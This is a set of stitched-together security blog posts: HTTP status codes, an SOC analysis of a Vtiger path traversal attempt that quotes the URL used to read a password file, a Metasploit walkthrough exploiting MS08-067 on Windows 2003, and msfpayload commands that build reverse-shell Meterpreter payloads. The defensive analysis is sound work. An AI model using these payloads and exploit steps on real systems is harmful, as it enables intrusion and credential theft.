List of HTTP status codes/IIS error Codes | blog-windows

List of HTTP status codes/IIS error Codes | blog-windows



blog-windows.com | List of HTTP status codes/IIS error Codes

Very much important while Analyzing Hacking attempt/incident related to Web server.


when you move to raw event below codes will exist in Raw event, it will help you to analyze the incident in a better way.


The following is a list of Hypertext Transfer Protocol (HTTP) response status codes. The first digit of the status code specifies one of five classes of response; the bare minimum for an HTTP client is that it recognises these five classes. The phrases used are the standard examples, but any human-readable alternative can be provided. Unless otherwise stated, the status code is part of the HTTP/1.1 standard


The Internet Assigned Numbers Authority (IANA) maintains the official registry of HTTP status codes.


Microsoft IIS sometimes uses additional decimal sub-codes to provide more specific information,[1] but these are not listed here.


Contents:-


1 1xx Informational
2 2xx Success
3 3xx Redirection
4 4xx Client Error
5 5xx Server Error
6 See also
7 References
8 External links 


4xx Client Error

The 4xx class of status code is intended for cases in which the client seems to have erred. Except when responding to a HEAD request, the server should include an entity containing an explanation of the error situation, and whether it is a temporary or permanent condition. These status codes are applicable to any request method

400 Bad Request
The request cannot be fulfilled due to bad syntax.


401 Unauthorized 
Similar to 403 Forbidden, but specifically for use when authentication is required and has failed or has not yet been provided.The response must include a WWW-Authenticate header field containing a challenge applicable to the requested resource. See Basic access authentication and Digest access authentication. 


402 Payment Required
Reserved for future use.The original intention was that this code might be used as part of some form of digital cash or micropayment scheme, but that has not happened, and this code is not usually used. As an example of its use, however, Apple's MobileMe service generates a 402 error if the MobileMe account is delinquent.[citation needed] In addition, YouTube uses this status if a particular IP address has made excessive requests, and requires the person to enter a CAPTCHA. 


403 Forbidden 
The request was a valid request, but the server is refusing to respond to it.Unlike a 401 Unauthorized response, authenticating will make no difference.On servers where authentication is required, this commonly means that the provided credentials were successfully authenticated but that the credentials still do not grant the client permission to access the resource (e.g. a recognized user attempting to access restricted content). 


404 Not Found
The requested resource could not be found but may be available again in the future.Subsequent requests by the client are permissible. 


405 Method Not Allowed 
A request was made of a resource using a request method not supported by that resource;for example, using GET on a form which requires data to be presented via POST, or using PUT on a read-only resource. 


406 Not Acceptable
The requested resource is only capable of generating content not acceptable according to the Accept headers sent in the request.

If you need to know more about error codes please refer below link

Reference Link:




Share Your Knowledge................................by comment -Regards, blog-windows blog (sms GeniusHacker on 9870807070)or http://labs.google.co.in/smschannels/channel/GeniusHacker


Owning a domain using Metasploit and incognito | blog-windows


blog-windows | Owning a domain using Metasploit and incognito




Share Your Knowledge................................by comment-Regards, blog-windows blog(sms GeniusHacker on 9870807070)or http://labs.google.co.in/smschannels/channel/GeniusHacker
Investigation and Solution | Vtiger Vulnerability (Elastix) | blog-windows

Investigation and Solution | Vtiger Vulnerability (Elastix) | blog-windows


Investigation and Solution | Vtiger Vulnerability (Elastix) | blog-windows

As a part of SOC team, we observed attacker (someone) from outside tried to exploit Vtiger vulnerability by exploiting one of the vulnerability invented in mid of 2012.

Actually he is trying to access one file i.e. Amportal.conf, this file consist of all passwords information and probably be used to view most any file on the system        
Here is brief explanation:
About Vtiger:-

I. BACKGROUND

Vtiger CRM is a free, full-featured, 100% Open Source CRM software ideal
for small and medium businesses, with low-cost product support available
to production users that need reliable support.

II. DESCRIPTION
Multiple Vulnerabilities exist in Vtiger CRM software.

III. ANALYSIS
Summary:
 A) Remote Code Execution (RCE) Vulnerability
 B) Local File Inclusion (LFI) Vulnerability (pre-auth)
 C) Cross Site Scripting (XSS) Vulnerabilities (pre-auth, reflected)
 D) Cross Site Scripting (XSS) Vulnerabilities (post-auth, reflected)

 Code we observed:

https://myipadddress/vtigercrm/modules/com_vtiger_workflow/sortfieldsjson.php?module_name=../../../../../../../..//etc/amportal.conf

When user browses this URL the amportal.conf was displayed, including all passwords therein.
Obviously the sortfieldsjson.php file is being used to access amportal.conf and can probably be used to view most any file on the system        
Disclosure Date : 2012-03-21
Exploit Publish Date : 2012-03-21

Description:
Vtiger CRM contains a flaw that allows a remote attacker to traverse outside of a restricted path. The issue is due to the sortfieldsjson.php script not properly sanitizing user input, specifically directory traversal style attacks (e.g. /../) supplied via the 'module_name' parameter. This directory traversal attack would allow the attacker to read arbitrary files.

Recommendation:
Ø  Kindly check the version of Vtiger they are using and update or patch it.
Ø  I strongly recommend that if you run Elastix (which includes Vtiger even if you don’t use it) that you either -

Limit access to the web interface of your server to only specific IP addresses.
If you don’t use Vtiger then disable access to the interface by running.
Upgrading Elastix? Read this FAQ Now!!
elx.ec/upgfaq

Elastix Docs : 
elx.ec/elastixtutorials
www.elastixconnection.com

Elastix Fault Finding Guide
elx.ec/faultfind


Root Cause Analysis :
After proper investigation we observed that attacker exploited the vulnerability as shown above in Linux Platform and we are using Windows based OS  then we got confirmation that we are not using Vtiger on our environment. Also I personally did investigation of that particular server.


Share Your Knowledge................................by comment
-Regards,
blog-windows blog
(sms GeniusHacker on 9870807070)or
http://labs.google.co.in/smschannels/channel/GeniusHacker


blog-windows | MS12-020 -- Critical vulnerability to attack on windows system




blog-windows.com | MS12-020 -- Critical vulnerability to attack on windows system


Hi All,
Welcome to my new video on critical vulnerability to attack on windows system.
The vulnerability in Microsoft's Remote Desktop Protocol (RDP) implementation (MS12-020) - a patch for which has been released by during the last Patch Tuesday.

this video made by blog-windows.com
demo: 






Share Your Knowledge................................by comment -Regards, blog-windows blog (sms GeniusHacker on 9870807070)or http://labs.google.co.in/smschannels/channel/GeniusHacker
blog-windows | Metasploit - Windows 2003 Server Exploitation with ms08_067_netapi vulnerability

blog-windows | Metasploit - Windows 2003 Server Exploitation with ms08_067_netapi vulnerability

blog-windows | Metasploit - Windows 2003 Server Exploitation with ms08_067_netapi vulnerability

In this article we will focus on exploitation a Windows 2003 server through the Microsoft directory service vulnerability.

We have performed a port scan with Nmap and we have observed that microsoft-ds service is open on port 445.

The use of this service is for file sharing activities in Windows environments.

Microsoft-ds Service is Open

Next step will be to open the metasploit framework in order to find the appropriate exploit that it will give us access to the remote server.

We already know that the port 445 is for the SMB service. So our search will be on the SMB exploits like the netapi.

Specifically the exploit that we are going to use is the ms08_067_netapi which exploits a parsing flaw in the path canonicalization code of NetAPI32.dll.

Search for the netapi Exploit

So we are configuring the exploit with the appropriate IP addresses and we will use as a payload the meterpreter service.

Netapi Exploit Configuration

Now it is time to run the exploit against the target machine and as we can see from the image below it successfully opened a meterpreter session.

Exploitation with the Netapi

We can use the sysinfo command of the meterpreter in order to discover our first information about the Windows 2003 Server.

Note:

The microsoft-ds is a very common service in Windows machines. Most of the servers will have this service enabled so it will be very easy to exploit them except if they are using a firewall that filters the port 445.Remember that this exploit will only work against a Windows 2003 Server it will work only in the following versions: Windows 2003 SP0,Windows 2003 SP1 and Windows 2003 SP2.

Share Your Knowledge................................by comment -Regards, blog-windows blog (sms GeniusHacker on 9870807070)or http://labs.google.co.in/smschannels/channel/GeniusHacker

Metasploit :- Payload Commands

Metasploit :- Payload Commands


blog-windows | Metasploit - Payload Commands

Here is a list with the available payload commands.


msfpayload -l
List available payloads

msfpayload windows/meterpreter/bind_tcp O

List all available options for the windows/meterpreter/bind_tcp payload

msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.1.1 LPORT=443 X >
payload.exe
Create a Meterpreter reverse_tcp payload to connect back to our IP on port 443.Then saves it as Windows executable file with the name payload.exe

msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.1.1 LPORT=443 R >
payload.raw

Create a Meterpreter reverse_tcp payload to connect back to our IP and saves it as raw format.It can be combined with msfencode.

msfpayload windows/meterpreter/bind_tcp LPORT=443 C > payload.c

Export as C-formatted shellcode

msfpayload windows/meterpreter/bind_tcp LPORT=443 J > payload.java
Export as %u encoded JavaScript


Share Your Knowledge................................by comment -Regards, blog-windows blog (sms GeniusHacker on 9870807070)or http://labs.google.co.in/smschannels/channel/GeniusHacker